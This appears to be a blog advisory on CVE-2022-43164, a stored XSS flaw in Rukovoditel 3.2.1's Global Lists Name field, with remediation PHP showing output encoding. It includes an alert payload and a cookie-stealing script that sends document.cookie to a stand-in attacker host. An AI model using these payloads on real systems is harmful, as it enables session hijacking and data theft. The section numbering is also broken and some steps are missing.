CVE-2022-43164 is a critical stored cross-site scripting (XSS) vulnerability found in the Rukovoditel open-source project management software, specifically version 3.2.1. This flaw lets authenticated users inject malicious JavaScript into the "Global Lists" feature, potentially hijacking admin sessions, stealing data, or spreading malware.
If you run Rukovoditel and haven’t patched, this is your wake-up call. Let’s see how the flaw works in detail, how you can test for it, and how to keep your deployment from getting owned.
1. Vulnerable Feature: Global Lists
Rukovoditel’s “Global Lists” are reusable lists you can apply throughout your project. The vulnerability lives in this feature, where new list entries are created.
The insecure part is in /index.php?module=global_lists/lists – specifically, the Name input field users fill out when adding to the list.
Submit the form.
Once submitted, the “Global Lists” page will now display the payload as part of the list, and anyone viewing the page—including admins—will trigger the script.
Here is a sample payload that demonstrates the XSS with an alert box:
"><script>alert('XSS')</script>
How to insert
- Name: "><script>alert('XSS')</script>
Submit this as the “Name” when creating the list.
Result:
When someone views the Global Lists page, the script executes and an alert box pops up (or, with a more malicious payload, attacker code runs in the victim’s browser).
Here’s a simple payload that reads the admin’s cookie and sends it to the attacker:
"><script>
fetch('https://attacker.site/cookie?' + document.cookie)
</script>
The attacker would set up attacker.site to log incoming GET requests. When an admin or another user views the infected Global List, the attacker receives the session cookie.
6. References
- CVE-2022-43164 NVD Listing
- Rukovoditel
- Exploit-Database reference (if/when public)
7. How to Fix
- Upgrade to the latest Rukovoditel version (check official downloads).
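Beyond upgrading, the underlying fix is output encoding wherever a stored list name is rendered. The following is an added illustration, not Rukovoditel’s own code, run over constructed sample rows that include the payload shown above; the function names and the row layout are assumptions:

```php
<?php
// Added example (not from the Rukovoditel code base): encode a stored list name on
// output so markup submitted through the "Name" field renders as inert text, and
// flag stored values that already contain markup so an admin can review them.

// Constructed sample rows, including the alert payload from this write-up.
$globalListRows = [
    ['id' => 1, 'name' => 'Priority'],
    ['id' => 2, 'name' => '"><script>alert(\'XSS\')</script>'],
];

// Output encoding for an HTML text/attribute context: &, <, >, " and ' are escaped.
// This must happen at render time, not at input time, so the stored value stays intact.
function renderListName(string $name): string
{
    return htmlspecialchars($name, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Review check for rows stored before the upgrade: tag openers or a javascript: URL
// are rarely legitimate in a list name, so such rows deserve a look.
function looksLikeMarkup(string $name): bool
{
    return (bool) preg_match('/<\s*[a-z!\/]|javascript:/i', $name);
}

foreach ($globalListRows as $row) {
    $flag = looksLikeMarkup($row['name']) ? ' <!-- REVIEW: markup in stored name -->' : '';
    echo '<li data-id="' . (int) $row['id'] . '">' . renderListName($row['name']) . '</li>' . $flag . "\n";
}
```

Run with `php` from the command line; the second row prints as `&lt;script&gt;...` rather than executing. Setting the HttpOnly flag on the session cookie is a separate, complementary control that stops `document.cookie` from exposing the session even if an injection slips through.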
Summary
CVE-2022-43164 is a classic yet serious vulnerability, showing how unchecked input in a “simple” field can undermine an entire application or business. Stored XSS lingers, and can be used to hijack accounts, deliver malware, or further compromise your project management data.
Timeline
Published on: 10/28/2022 17:15:00 UTC
Last modified on: 10/28/2022 18:52:00 UTC